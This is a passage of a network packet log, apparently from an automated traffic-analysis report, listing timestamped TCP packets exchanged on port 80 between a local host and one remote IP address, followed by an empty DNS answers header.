                                                                      Dec 23, 2024 06:38:47.542325020 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.542345047 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.542368889 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.542392015 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.542409897 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.542429924 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.542448044 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.542469025 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.542493105 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.542511940 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.542538881 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.542557001 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.542574883 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.542602062 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.542618036 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.542638063 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.542665005 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.542685032 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.542717934 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.542717934 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.542740107 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.542763948 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.542790890 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.542807102 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.542834044 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.542860985 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.542879105 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.542901993 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.542918921 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.542942047 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.542959929 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.542974949 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.542995930 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.543024063 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.543041945 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.543056965 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.543083906 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.543101072 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.543127060 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.543154955 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.543173075 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.543188095 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.543209076 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.543231010 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.543273926 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.543273926 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.543308973 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.543308973 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.543354988 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.543749094 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.543749094 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.543749094 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.543749094 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.543749094 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.543750048 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.543750048 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.543750048 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.543852091 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.543853045 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.543853045 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.543853045 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.543853045 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.543853045 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.543910027 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.543910027 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.543929100 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.543947935 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.543966055 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.544023991 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.544023991 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.544023991 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.544068098 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.544068098 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.544086933 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.544106960 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.544130087 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.544157982 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.544176102 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.544210911 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.544210911 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.544236898 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.544276953 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.655687094 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.655719995 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.655749083 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.656061888 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.656110048 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.656137943 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.656166077 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.656193018 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.656220913 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.656246901 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.656274080 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.656307936 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.656335115 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.656361103 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.656387091 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.656419039 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.656445026 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.656497002 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.656523943 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.656550884 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.656589985 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.656616926 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.656644106 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.656675100 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.656702042 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.656728029 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.656754971 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.775856972 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.775899887 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.775929928 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.775958061 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.775985956 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.776014090 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.776041985 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.776068926 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.776097059 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.776124001 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.776150942 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.776177883 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.776235104 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.776262999 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.776289940 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.776318073 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.776345015 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.776371956 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.776398897 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.776457071 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.776484966 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.776511908 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.776539087 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.776566982 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.776593924 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.776621103 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.776648998 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.776675940 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.776704073 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.776731014 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.776788950 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.776817083 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.776844025 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.776871920 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.776900053 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.776926994 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.776958942 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.776987076 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.777014971 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.777041912 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.777069092 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.777096033 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.777123928 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.777151108 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.777178049 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.777204990 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.777231932 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.777259111 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.777287006 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.777314901 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.777340889 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.777369022 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.777395964 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.777422905 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.777472973 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.777517080 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.777544975 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.777571917 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.777600050 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.777626038 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.777653933 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.777681112 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.777708054 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.777734995 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.777762890 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.777791977 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.777820110 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.777846098 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.777873993 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.777900934 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.777929068 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.777956009 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.777982950 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.778009892 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.778037071 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.778064013 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.778090954 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.778117895 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.778143883 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.778196096 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.778228998 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.778255939 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.778284073 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.778311014 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.778338909 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.778366089 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.778393030 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.778420925 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.778446913 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.778474092 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.778501034 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.778527975 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.778553963 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.778580904 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.778609037 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.778635025 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.778661013 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.778687954 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.778714895 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.778742075 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.778772116 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.778799057 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.778825045 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.778852940 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.778901100 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.778948069 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.778975964 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.779002905 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.779031992 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.779058933 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.779086113 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.779114008 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.779140949 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.779166937 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.779194117 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.779221058 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.779248953 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.779275894 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.779303074 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.779357910 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.779416084 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.779443979 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.779473066 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.779500008 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.779542923 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.779567957 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.779596090 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.779623032 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.779650927 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.779681921 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.779716969 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.779745102 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.779773951 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.779800892 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.779829025 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.779858112 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.779887915 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.779915094 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.779942989 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.779968977 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.779997110 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.780025005 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.780051947 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.780080080 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.780107021 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.780128002 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.780141115 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.780153990 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.780167103 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.780179977 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.780193090 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.780205965 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.780219078 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.780231953 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.780255079 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.780272007 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.780284882 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.780298948 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.780311108 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.780324936 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.780337095 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.780350924 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.780364037 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.780376911 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.780390024 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.780402899 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.780415058 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.780428886 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.780442953 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.780456066 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.780468941 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.780482054 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.780493975 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.780507088 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.780519962 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.780533075 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.780544996 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.780556917 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.780570030 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.780590057 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.780612946 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.780626059 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.780637980 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.780651093 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.780663967 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.780677080 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.780690908 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.780704021 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.780716896 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.780729055 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.780740976 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.780755043 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.780767918 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.780781984 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.780795097 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.780807972 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.780821085 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.780833006 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.780853033 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.780865908 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.780879021 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.780891895 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.780905008 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.780917883 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.780930042 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.780942917 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.780956984 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.780970097 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.780983925 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:39:01.646213055 CET8049739212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:39:01.646286964 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:39:01.646318913 CET8049740212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:39:01.646373987 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:39:01.648837090 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:39:01.660984039 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:39:01.768394947 CET8049739212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:39:01.781306982 CET8049740212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:39:09.443321943 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:39:09.443448067 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:39:09.443537951 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:39:09.563016891 CET8049741212.193.31.8192.168.2.4

                                                                      DNS Answers

                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
